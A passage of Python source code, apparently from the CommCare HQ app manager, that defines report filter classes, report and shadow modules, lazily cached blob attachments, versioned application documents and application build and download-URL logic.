return _get_auto_filter_function(self.filter_type)(user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
custom_data_property = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
select_value = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
value = StringListProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=string_value, display=None) for string_value in self.value]
class StaticDatespanFilter(ReportAppFilter):
date_range = StringProperty(
choices=[choice.slug for choice in get_simple_dateranges()],
required=True,
)
def get_filter_value(self, user, ui_filter):
start_date, end_date = get_daterange_start_end_dates(self.date_range)
return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
operator = StringProperty(
choices=[
'=',
'<=',
'>=',
'>',
'<',
'between'
],
required=True,
)
date_number = StringProperty(required=True)
date_number2 = StringProperty()
def get_filter_value(self, user, ui_filter):
assert user is not None, (
"CustomDatespanFilter.get_filter_value must be called "
"with an OTARestoreUser object, not None")
timezone = get_timezone_for_domain(user.domain)
today = ServerTime(datetime.datetime.utcnow()).user_time(timezone).done().date()
start_date = end_date = None
days = int(self.date_number)
if self.operator == 'between':
days2 = int(self.date_number2)
# allows user to have specified the two numbers in either order
if days > days2:
end = days2
start = days
else:
start = days2
end = days
start_date = today - datetime.timedelta(days=start)
end_date = today - datetime.timedelta(days=end)
elif self.operator == '=':
start_date = end_date = today - datetime.timedelta(days=days)
elif self.operator == '>=':
start_date = None
end_date = today - datetime.timedelta(days=days)
elif self.operator == '<=':
start_date = today - datetime.timedelta(days=days)
end_date = None
elif self.operator == '<':
start_date = today - datetime.timedelta(days=days - 1)
end_date = None
elif self.operator == '>':
start_date = None
end_date = today - datetime.timedelta(days=days + 1)
return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
def validate(x):
if not x <= integer:
raise BadValueError('Value must be less than or equal to {}'.format(integer))
return validate
def is_gte(integer):
def validate(x):
if not x >= integer:
raise BadValueError('Value must be greater than or equal to {}'.format(integer))
return validate
class CustomMonthFilter(ReportAppFilter):
"""
Filter by months that start on a day number other than 1
See [FB 215656](http://manage.dimagi.com/default.asp?215656)
"""
# Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
# len(February).
start_of_month = IntegerProperty(
required=True,
validators=(is_gte(-27), is_lte(28))
)
# DateSpan to return i.t.o. number of months to go back
period = IntegerProperty(
default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
validators=(is_gte(0),)
)
@classmethod
def wrap(cls, doc):
doc['start_of_month'] = int(doc['start_of_month'])
if 'period' in doc:
doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
return super(CustomMonthFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
def get_last_month(this_month):
return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)
def get_last_day(date):
_, last_day = calendar.monthrange(date.year, date.month)
return last_day
start_of_month = int(self.start_of_month)
today = datetime.date.today()
if start_of_month > 0:
start_day = start_of_month
else:
# start_of_month is zero or negative. Work backwards from the end of the month
start_day = get_last_day(today) + start_of_month
# Loop over months backwards for period > 0
month = today if today.day >= start_day else get_last_month(today)
for i in range(int(self.period)):
month = get_last_month(month)
if start_of_month > 0:
start_date = datetime.date(month.year, month.month, start_day)
days = get_last_day(start_date) - 1
end_date = start_date + datetime.timedelta(days=days)
else:
start_day = get_last_day(month) + start_of_month
start_date = datetime.date(month.year, month.month, start_day)
next_month = datetime.date(month.year, month.month, get_last_day(month)) + datetime.timedelta(days=1)
end_day = get_last_day(next_month) + start_of_month - 1
end_date = datetime.date(next_month.year, next_month.month, end_day)
return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
def get_filter_value(self, user, ui_filter):
return None
class AncestorLocationTypeFilter(ReportAppFilter):
ancestor_location_type_name = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.locations.models import SQLLocation
from corehq.apps.reports_core.filters import REQUEST_USER_KEY
kwargs = {REQUEST_USER_KEY: user}
try:
ancestor = user.sql_location.get_ancestors(include_self=True).\
get(location_type__name=self.ancestor_location_type_name)
kwargs[ui_filter.name] = ancestor.location_id
except (AttributeError, SQLLocation.DoesNotExist):
# user.sql_location is None, or location does not have an ancestor of that type
pass
return ui_filter.value(**kwargs)
class NumericFilter(ReportAppFilter):
operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>=']),
operand = FloatProperty()
@classmethod
def wrap(cls, doc):
doc['operand'] = float(doc['operand'])
return super(NumericFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
return {
'operator': self.operator,
'operand': self.operand,
}
class ReportAppConfig(DocumentSchema):
"""
Class for configuring how a user configurable report shows up in an app
"""
# ID of the ReportConfiguration
report_id = StringProperty(required=True)
header = DictProperty()
localized_description = DictProperty()
xpath_description = StringProperty()
use_xpath_description = BooleanProperty(default=False)
show_data_table = BooleanProperty(default=True)
complete_graph_configs = DictProperty(GraphConfiguration)
filters = SchemaDictProperty(ReportAppFilter)
# Unique ID of this mobile report config
uuid = StringProperty(required=True)
report_slug = StringProperty(required=False) # optional, user-provided
sync_delay = DecimalProperty(default=0.0) # in hours
_report = None
def __init__(self, *args, **kwargs):
super(ReportAppConfig, self).__init__(*args, **kwargs)
if not self.uuid:
self.uuid = uuid.uuid4().hex
@classmethod
def wrap(cls, doc):
# for backwards compatibility with apps that have localized or xpath descriptions
old_description = doc.get('description')
if old_description:
if isinstance(old_description, six.string_types) and not doc.get('xpath_description'):
soft_assert_type_text(old_description)
doc['xpath_description'] = old_description
elif isinstance(old_description, dict) and not doc.get('localized_description'):
doc['localized_description'] = old_description
if not doc.get('xpath_description'):
doc['xpath_description'] = '""'
return super(ReportAppConfig, cls).wrap(doc)
def report(self, domain):
if self._report is None:
from corehq.apps.userreports.models import get_report_config
self._report = get_report_config(self.report_id, domain)[0]
return self._report
@property
def instance_id(self):
return self.report_slug or self.uuid
class ReportModule(ModuleBase):
"""
Module for user configurable reports
"""
module_type = 'report'
report_configs = SchemaListProperty(ReportAppConfig)
forms = []
_loaded = False
put_in_root = False
@property
@memoized
def reports(self):
from corehq.apps.userreports.models import get_report_configs
return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)
@classmethod
def new_module(cls, name, lang):
module = ReportModule(
name={(lang or 'en'): name or ugettext("Reports")},
case_type='',
)
module.get_or_create_unique_id()
return module
def get_details(self):
from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_details()
def get_custom_entries(self):
from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_custom_entries()
def get_menus(self, supports_module_filter=False):
kwargs = {}
if supports_module_filter:
kwargs['relevant'] = interpolate_xpath(self.module_filter)
menu = suite_models.LocalizedMenu(
id=id_strings.menu_id(self),
menu_locale_id=id_strings.module_locale(self),
media_image=bool(len(self.all_image_paths())),
media_audio=bool(len(self.all_audio_paths())),
image_locale_id=id_strings.module_icon_locale(self),
audio_locale_id=id_strings.module_audio_locale(self),
**kwargs
)
menu.commands.extend([
suite_models.Command(id=id_strings.report_command(config.uuid))
for config in self.report_configs
])
yield menu
def check_report_validity(self):
"""
returns is_valid, valid_report_configs
If any report doesn't exist, is_valid is False, otherwise True
valid_report_configs is a list of all report configs that refer to existing reports
"""
try:
all_report_ids = [report._id for report in self.reports]
valid_report_configs = [report_config for report_config in self.report_configs
if report_config.report_id in all_report_ids]
is_valid = (len(valid_report_configs) == len(self.report_configs))
except ReportConfigurationNotFoundError:
valid_report_configs = [] # assuming that if one report is in a different domain, they all are
is_valid = False
return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
is_valid=is_valid,
valid_report_configs=valid_report_configs
)
@property
def validator(self):
return ReportModuleValidator(self)
class ShadowModule(ModuleBase, ModuleDetailsMixin):
"""
A module that acts as a shortcut to another module. This module has its own
settings (name, icon/audio, filter, etc.) and its own case list/detail, but
inherits case type and forms from its source module.
"""
module_type = 'shadow'
source_module_id = StringProperty()
forms = []
excluded_form_ids = SchemaListProperty()
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
get_forms = IndexedSchema.Getter('forms')
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(ShadowModule, cls).wrap(data)
@property
def source_module(self):
if self.source_module_id:
try:
return self._parent.get_module_by_unique_id(self.source_module_id)
except ModuleNotFoundException:
pass
return None
@property
def case_type(self):
if not self.source_module:
return None
return self.source_module.case_type
@property
def requires(self):
if not self.source_module:
return 'none'
return self.source_module.requires
@property
def root_module_id(self):
if not self.source_module:
return None
return self.source_module.root_module_id
def get_suite_forms(self):
if not self.source_module:
return []
return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]
@parse_int([1])
def get_form(self, i):
return None
def requires_case_details(self):
if not self.source_module:
return False
return self.source_module.requires_case_details()
def get_case_types(self):
if not self.source_module:
return []
return self.source_module.get_case_types()
@memoized
def get_subcase_types(self):
if not self.source_module:
return []
return self.source_module.get_subcase_types()
@memoized
def all_forms_require_a_case(self):
if not self.source_module:
return []
return self.source_module.all_forms_require_a_case()
@classmethod
def new_module(cls, name, lang):
lang = lang or 'en'
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = ShadowModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
)
module.get_or_create_unique_id()
return module
@property
def validator(self):
return ShadowModuleValidator(self)
class LazyBlobDoc(BlobMixin):
"""LazyAttachmentDoc for blob db
Cache blobs in local memory (for this request)
and in django cache (for the next few requests)
and commit to couchdb.
See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`
Cache strategy:
- on fetch, check in local memory, then cache
- if both are a miss, fetch from couchdb and store in both
- after an attachment is committed to the blob db and the
save save has succeeded, save the attachment in the cache
"""
def __init__(self, *args, **kwargs):
super(LazyBlobDoc, self).__init__(*args, **kwargs)
self._LAZY_ATTACHMENTS = {}
# to cache fetched attachments
# these we do *not* send back down upon save
self._LAZY_ATTACHMENTS_CACHE = {}
@classmethod
def wrap(cls, data):
if "_attachments" in data:
data = data.copy()
attachments = data.pop("_attachments").copy()
if cls._migrating_blobs_from_couch:
# preserve stubs so couch attachments don't get deleted on save
stubs = {}
for name, value in list(attachments.items()):
if isinstance(value, dict) and "stub" in value:
stubs[name] = attachments.pop(name)
if stubs:
data["_attachments"] = stubs
else:
attachments = None
self = super(LazyBlobDoc, cls).wrap(data)
if attachments:
for name, attachment in attachments.items():
if isinstance(attachment, six.text_type):
attachment = attachment.encode('utf-8')
if isinstance(attachment, bytes):
info = {"content": attachment}
else:
raise ValueError("Unknown attachment format: {!r}"
.format(attachment))
self.lazy_put_attachment(name=name, **info)
return self
def __attachment_cache_key(self, name):
return 'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
def __set_cached_attachment(self, name, content, timeout=60*60*24):
cache.set(self.__attachment_cache_key(name), content, timeout=timeout)
self._LAZY_ATTACHMENTS_CACHE[name] = content
def __get_cached_attachment(self, name):
try:
# it has been fetched already during this request
content = self._LAZY_ATTACHMENTS_CACHE[name]
except KeyError:
content = cache.get(self.__attachment_cache_key(name))
if content is not None:
if isinstance(content, six.text_type):
_soft_assert(False, 'cached attachment has type unicode')
content = content.encode('utf-8')
self._LAZY_ATTACHMENTS_CACHE[name] = content
return content
def put_attachment(self, content, name=None, *args, **kw):
cache.delete(self.__attachment_cache_key(name))
self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
def has_attachment(self, name):
return name in self.lazy_list_attachments()
def lazy_put_attachment(self, content, name=None, content_type=None,
content_length=None):
"""
Ensure the attachment is available through lazy_fetch_attachment
and that upon self.save(), the attachments are put to the doc as well
"""
self._LAZY_ATTACHMENTS[name] = {
'content': content,
'content_type': content_type,
'content_length': content_length,
}
def lazy_fetch_attachment(self, name):
# it has been put/lazy-put already during this request
if name in self._LAZY_ATTACHMENTS:
content = self._LAZY_ATTACHMENTS[name]['content']
else:
content = self.__get_cached_attachment(name)
if content is None:
try:
content = self.fetch_attachment(name, return_bytes=True)
except ResourceNotFound as e:
# django cache will pickle this exception for you
# but e.response isn't picklable
if hasattr(e, 'response'):
del e.response
content = e
self.__set_cached_attachment(name, content, timeout=60*5)
raise
else:
self.__set_cached_attachment(name, content)
if isinstance(content, ResourceNotFound):
raise content
return content
def lazy_list_attachments(self):
keys = set()
keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
keys.update(self.blobs or {})
return keys
def save(self, **params):
def super_save():
super(LazyBlobDoc, self).save(**params)
if self._LAZY_ATTACHMENTS:
with self.atomic_blobs(super_save):
for name, info in self._LAZY_ATTACHMENTS.items():
if not info['content_type']:
info['content_type'] = ';'.join(filter(None, guess_type(name)))
super(LazyBlobDoc, self).put_attachment(name=name, **info)
# super_save() has succeeded by now
for name, info in self._LAZY_ATTACHMENTS.items():
self.__set_cached_attachment(name, info['content'])
self._LAZY_ATTACHMENTS.clear()
else:
super_save()
class VersionedDoc(LazyBlobDoc):
"""
A document that keeps an auto-incrementing version number, knows how to make copies of itself,
delete a copy of itself, and revert back to an earlier copy of itself.
"""
domain = StringProperty()
copy_of = StringProperty()
version = IntegerProperty()
short_url = StringProperty()
short_odk_url = StringProperty()
short_odk_media_url = StringProperty()
_meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
@property
def id(self):
return self._id
@property
def master_id(self):
"""Return the ID of the 'master' app. For app builds this is the ID
of the app they were built from otherwise it's just the app's ID."""
return self.copy_of or self._id
def save(self, response_json=None, increment_version=None, **params):
if increment_version is None:
increment_version = not self.copy_of and self.doc_type != 'LinkedApplication'
if increment_version:
self.version = self.version + 1 if self.version else 1
super(VersionedDoc, self).save(**params)
if response_json is not None:
if 'update' not in response_json:
response_json['update'] = {}
response_json['update']['app-version'] = self.version
def make_build(self):
assert self.get_id
assert self.copy_of is None
cls = self.__class__
copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
if copies:
copy = copies[0]
else:
copy = deepcopy(self.to_json())
bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
for bad_key in bad_keys:
if bad_key in copy:
del copy[bad_key]
copy = cls.wrap(copy)
copy['copy_of'] = self._id
copy.copy_attachments(self)
return copy
def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
for name in other.lazy_list_attachments() or {}:
if regexp is None or re.match(regexp, name):
self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
def make_reversion_to_copy(self, copy):
"""
Replaces couch doc with a copy of the backup ("copy").
Returns the another Application/RemoteApp referring to this
updated couch doc. The returned doc should be used in place of
the original doc, i.e. should be called as follows:
app = app.make_reversion_to_copy(copy)
app.save()
"""
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
app = deepcopy(copy.to_json())
app['_rev'] = self._rev
app['_id'] = self._id
app['version'] = self.version
app['copy_of'] = None
app.pop('_attachments', None)
app.pop('external_blobs', None)
cls = self.__class__
app = cls.wrap(app)
app.copy_attachments(copy)
return app
def delete_copy(self, copy):
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
copy.delete_app()
copy.save(increment_version=False)
def scrub_source(self, source):
"""
To be overridden.
Use this to scrub out anything
that should be shown in the
application source, such as ids, etc.
"""
return source
def export_json(self, dump_json=True):
source = deepcopy(self.to_json())
for field in self._meta_fields:
if field in source:
del source[field]
_attachments = self.get_attachments()
# the '_attachments' value is a dict of `name: blob_content`
# pairs, and is part of the exported (serialized) app interface
source['_attachments'] = _attachments
source.pop("external_blobs", None)
source = self.scrub_source(source)
return json.dumps(source) if dump_json else source
def get_attachments(self):
attachments = {}
for name in self.lazy_list_attachments():
if re.match(ATTACHMENT_REGEX, name):
# FIXME loss of metadata (content type, etc.)
attachments[name] = self.lazy_fetch_attachment(name)
return attachments
def save_attachments(self, attachments, save=None):
with self.atomic_blobs(save=save):
for name, attachment in attachments.items():
if re.match(ATTACHMENT_REGEX, name):
self.put_attachment(attachment, name)
return self
@classmethod
def from_source(cls, source, domain):
for field in cls._meta_fields:
if field in source:
del source[field]
source['domain'] = domain
app = cls.wrap(source)
return app
def is_deleted(self):
return self.doc_type.endswith(DELETED_SUFFIX)
def unretire(self):
self.doc_type = self.get_doc_type()
self.save()
def get_doc_type(self):
if self.doc_type.endswith(DELETED_SUFFIX):
return self.doc_type[:-len(DELETED_SUFFIX)]
else:
return self.doc_type
def absolute_url_property(method):
"""
Helper for the various fully qualified application URLs
Turns a method returning an unqualified URL
into a property returning a fully qualified URL
(e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
Expects `self.url_base` to be fully qualified url base
"""
@wraps(method)
def _inner(self):
return "%s%s" % (self.url_base, method(self))
return property(_inner)
class BuildProfile(DocumentSchema):
name = StringProperty()
langs = StringListProperty()
practice_mobile_worker_id = StringProperty()
def __eq__(self, other):
return self.langs == other.langs and self.practice_mobile_worker_id == other.practice_mobile_worker_id
def __ne__(self, other):
return not self.__eq__(other)
class ApplicationBase(VersionedDoc, SnapshotMixin,
CommCareFeatureSupportMixin,
CommentMixin):
"""
Abstract base class for Application and RemoteApp.
Contains methods for generating the various files and zipping them into CommCare.jar
See note at top of file for high-level overview.
"""
_blobdb_type_code = CODES.application
recipients = StringProperty(default="")
# this is the supported way of specifying which commcare build to use
build_spec = SchemaProperty(BuildSpec)
platform = StringProperty(
choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
default="nokia/s40"
)
text_input = StringProperty(
choices=['roman', 'native', 'custom-keys', 'qwerty'],
default="roman"
)
# The following properties should only appear on saved builds
# built_with stores a record of CommCare build used in a saved app
built_with = SchemaProperty(BuildRecord)
build_signed = BooleanProperty(default=True)
built_on = DateTimeProperty(required=False)
build_comment = StringProperty()
comment_from = StringProperty()
build_broken = BooleanProperty(default=False)
is_auto_generated = BooleanProperty(default=False)
# not used yet, but nice for tagging/debugging
# currently only canonical value is 'incomplete-build',
# for when build resources aren't found where they should be
build_broken_reason = StringProperty()
# watch out for a past bug:
# when reverting to a build that happens to be released
# that got copied into into the new app doc, and when new releases were made,
# they were automatically starred
# AFAIK this is fixed in code, but my rear its ugly head in an as-yet-not-understood
# way for apps that already had this problem. Just keep an eye out
is_released = BooleanProperty(default=False)
# django-style salted hash of the admin password
admin_password = StringProperty()
# a=Alphanumeric, n=Numeric, x=Neither (not allowed)
admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
langs = StringListProperty()
secure_submissions = BooleanProperty(default=False)
# metadata for data platform
amplifies_workers = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
amplifies_project = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
minimum_use_threshold = StringProperty(
default='15'
)
experienced_threshold = StringProperty(
default='3'
)
# exchange properties
cached_properties = DictProperty()
description = StringProperty()
deployment_date = DateTimeProperty()
phone_model = StringProperty()
user_type = StringProperty()
attribution_notes = StringProperty()
# always false for RemoteApp
case_sharing = BooleanProperty(default=False)
vellum_case_management = BooleanProperty(default=True)
# legacy property; kept around to be able to identify (deprecated) v1 apps
application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
last_modified = DateTimeProperty()
def assert_app_v2(self):
assert self.application_version == APP_V2
build_profiles = SchemaDictProperty(BuildProfile)
practice_mobile_worker_id = StringProperty()
use_j2me_endpoint = BooleanProperty(default=False)
target_commcare_flavor = StringProperty(
default='none',
choices=['none', TARGET_COMMCARE, TARGET_COMMCARE_LTS]
)
# Whether or not the Application has had any forms submitted against it
has_submissions = BooleanProperty(default=False)
# domains that are allowed to have linked apps with this master
linked_whitelist = StringListProperty()
mobile_ucr_restore_version = StringProperty(
default=MOBILE_UCR_VERSION_1, choices=MOBILE_UCR_VERSIONS, required=False
)
location_fixture_restore = StringProperty(
default=DEFAULT_LOCATION_FIXTURE_OPTION, choices=LOCATION_FIXTURE_OPTIONS,
required=False
)
@staticmethod
def _scrap_old_conventions(data):
should_save = False
# scrape for old conventions and get rid of them
if 'commcare_build' in data:
version, build_number = data['commcare_build'].split('/')
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_build']
if 'commcare_tag' in data:
version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_tag']
if "built_with" in data and isinstance(data['built_with'], six.string_types):
soft_assert_type_text(data['built_with'])
data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
if 'native_input' in data:
if 'text_input' not in data:
data['text_input'] = 'native' if data['native_input'] else 'roman'
del data['native_input']
if 'build_langs' in data:
if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
data['build_profiles'] = {
uuid.uuid4().hex: dict(
name=', '.join(data['build_langs']),
langs=data['build_langs']
)
}
should_save = True
del data['build_langs']
if 'original_doc' in data:
data['copy_history'] = [data.pop('original_doc')]
should_save = True
return should_save
@classmethod
def wrap(cls, data, scrap_old_conventions=True):
if scrap_old_conventions:
should_save = cls._scrap_old_conventions(data)
data["description"] = data.get('description') or data.get('short_description')
self = super(ApplicationBase, cls).wrap(data)
if not self.build_spec or self.build_spec.is_null():
self.build_spec = get_default_build_spec()
if scrap_old_conventions and should_save:
self.save()
return self
@property
@memoized
def global_app_config(self):
return GlobalAppConfig.for_app(self)
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
def is_remote_app(self):
return False
@memoized
def get_previous_version(self):
return self.view('app_manager/applications',
startkey=[self.domain, self.master_id, {}],
endkey=[self.domain, self.master_id],
include_docs=True,
limit=1,
descending=True,
).first()
@memoized
def get_latest_saved(self):
"""
This looks really similar to get_latest_app, not sure why tim added
"""
doc = (get_latest_released_app_doc(self.domain, self._id) or
get_latest_build_doc(self.domain, self._id))
return self.__class__.wrap(doc) if doc else None
def set_admin_password(self, raw_password):
salt = os.urandom(5).encode('hex')
self.admin_password = make_password(raw_password, salt=salt)
if raw_password.isnumeric():
self.admin_password_charset = 'n'
elif raw_password.isalnum():
self.admin_password_charset = 'a'
else:
self.admin_password_charset = 'x'
def get_build(self):
return self.build_spec.get_build()
@property
def build_version(self):
# `LooseVersion`s are smart!
# LooseVersion('2.12.0') > '2.2'
# (even though '2.12.0' < '2.2')
if self.build_spec.version:
return LooseVersion(self.build_spec.version)
@property
def commcare_minor_release(self):
"""This is mostly just for views"""
return '%d.%d' % self.build_spec.minor_release()
@property
def short_name(self):
return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
@property
def url_base(self):
custom_base_url = getattr(self, 'custom_base_url', None)
return custom_base_url or get_url_base()
@absolute_url_property
def post_url(self):
if self.secure_submissions:
url_name = 'receiver_secure_post_with_app_id'
else:
url_name = 'receiver_post_with_app_id'
return reverse(url_name, args=[self.domain, self.get_id])
@absolute_url_property
def key_server_url(self):
return reverse('key_server_url', args=[self.domain])
@absolute_url_property
def heartbeat_url(self):
return reverse('phone_heartbeat', args=[self.domain, self.get_id])
@absolute_url_property
def ota_restore_url(self):
return reverse('app_aware_restore', args=[self.domain, self._id])
@absolute_url_property
def form_record_url(self):
return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
@absolute_url_property
def hq_profile_url(self):
# RemoteApp already has a property called "profile_url",
# Application.profile_url just points here to stop the conflict
# http://manage.dimagi.com/default.asp?227088#1149422
return "%s?latest=true" % (
reverse('download_profile', args=[self.domain, self._id])
)
@absolute_url_property
def media_profile_url(self):
return "%s?latest=true" % (
reverse('download_media_profile', args=[self.domain, self._id])
)
@property
def profile_loc(self):
return "jr://resource/profile.xml"
@absolute_url_property
def jar_url(self):
return reverse('download_jar', args=[self.domain, self._id])
@absolute_url_property
def recovery_measures_url(self):
return reverse('recovery_measures', args=[self.domain, self._id])
def get_jar_path(self):
spec = {
'nokia/s40': 'Nokia/S40',
'nokia/s60': 'Nokia/S60',
'generic': 'Generic/Default',
'winmo': 'Native/WinMo'
}[self.platform]
if self.platform in ('nokia/s40', 'nokia/s60'):
spec += {
('native',): '-native-input',
('roman',): '-generic',
('custom-keys',): '-custom-keys',
('qwerty',): '-qwerty'
}[(self.text_input,)]
return spec
def get_jadjar(self):
return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
def validate_jar_path(self):
build = self.get_build()
setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
value = self.text_input
setting_version = setting['since'].get(value)
if setting_version:
setting_version = tuple(map(int, setting_version.split('.')))
my_version = build.minor_release()
if my_version < setting_version:
i = setting['values'].index(value)
assert i != -1
name = _(setting['value_names'][i])
raise AppEditingError((
'%s Text Input is not supported '
'in CommCare versions before %s.%s. '
'(You are using %s.%s)'
) % ((name,) + setting_version + my_version))
@property
def jad_settings(self):
settings = {
'JavaRosa-Admin-Password': self.admin_password,
'Profile': self.profile_loc,
'MIDlet-Jar-URL': self.jar_url,
#'MIDlet-Name': self.name,
# e.g. 2011-Apr-11 20:45
'CommCare-Release': "true",
}
if not self.build_version or self.build_version < LooseVersion('2.8'):
settings['Build-Number'] = self.version
return settings
def create_build_files(self, build_profile_id=None):
all_files = self.create_all_files(build_profile_id)
for filepath in all_files:
self.lazy_put_attachment(all_files[filepath],
'files/%s' % filepath)
def create_jadjar_from_build_files(self, save=False):
self.validate_jar_path()
with CriticalSection(['create_jadjar_' + self._id]):
try:
return (
self.lazy_fetch_attachment('CommCare.jad'),
self.lazy_fetch_attachment('CommCare.jar'),
)
except (ResourceNotFound, KeyError):
all_files = {
filename[len('files/'):]: self.lazy_fetch_attachment(filename)
for filename in self.blobs if filename.startswith('files/')
}
all_files = {
name: (contents if isinstance(contents, (bytes, SafeBytes)) else contents.encode('utf-8'))
for name, contents in all_files.items()
}
release_date = self.built_with.datetime or datetime.datetime.utcnow()
jad_settings = {
'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
}
jad_settings.update(self.jad_settings)
jadjar = self.get_jadjar().pack(all_files, jad_settings)
if save:
self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
self.built_with.signed = jadjar.signed
return jadjar.jad, jadjar.jar
@property
@memoized
def timing_context(self):
return TimingContext(self.name)
def validate_app(self):
return ApplicationBaseValidator(self).validate_app()
@absolute_url_property
def odk_profile_url(self):
return reverse('download_odk_profile', args=[self.domain, self._id])
@absolute_url_property
def odk_media_profile_url(self):
return reverse('download_odk_media_profile', args=[self.domain, self._id])
def get_odk_qr_code(self, with_media=False, build_profile_id=None, download_target_version=False):
"""Returns a QR code, as a PNG to install on CC-ODK"""
filename = 'qrcode.png' if not download_target_version else 'qrcode-targeted.png'
try:
return self.lazy_fetch_attachment(filename)
except ResourceNotFound:
url = self.odk_profile_url if not with_media else self.odk_media_profile_url
kwargs = []
if build_profile_id is not None:
kwargs.append('profile={profile_id}'.format(profile_id=build_profile_id))
if download_target_version:
kwargs.append('download_target_version=true')
url += '?' + '&'.join(kwargs)
image = qrcode.make(url)
output = BytesIO()
image.save(output, "PNG")
qr_content = output.getvalue()
self.lazy_put_attachment(qr_content, filename,
content_type="image/png")
return qr_content
def generate_shortened_url(self, view_name, build_profile_id=None):
try:
if settings.BITLY_LOGIN:
if build_profile_id is not None:
long_url = "{}{}?profile={}".format(
self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
)
else:
long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
shortened_url = bitly.shorten(long_url)
else:
shortened_url = None
except Exception:
logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
else:
return shortened_url
def get_short_url(self, build_profile_id=None):
if not build_profile_id:
if not self.short_url:
self.short_url = self.generate_shortened_url('download_jad')
self.save()
return self.short_url
else:
return self.generate_shortened_url('download_jad', build_profile_id)
def get_short_odk_url(self, with_media=False, build_profile_id=None):
if not build_profile_id:
if with_media:
if not self.short_odk_media_url:
self.short_odk_media_url = self.generate_shortened_url('download_odk_media_profile')
self.save()
return self.short_odk_media_url
else:
if not self.short_odk_url:
self.short_odk_url = self.generate_shortened_url('download_odk_profile')
self.save()
return self.short_odk_url
else:
if with_media:
return self.generate_shortened_url('download_odk_media_profile', build_profile_id)
else:
return self.generate_shortened_url('download_odk_profile', build_profile_id)
def fetch_jar(self):
return self.get_jadjar().fetch_jar()
@time_method()
def make_build(self, comment=None, user_id=None):
copy = super(ApplicationBase, self).make_build()
if not copy._id:
# I expect this always to be the case
# but check explicitly so as not to change the _id if it exists
copy._id = uuid.uuid4().hex
copy.create_build_files()
# since this hard to put in a test
# I'm putting this assert here if copy._id is ever None
# which makes tests error
assert copy._id
built_on = datetime.datetime.utcnow()
copy.date_created = built_on
copy.built_on = built_on
copy.built_with = BuildRecord(
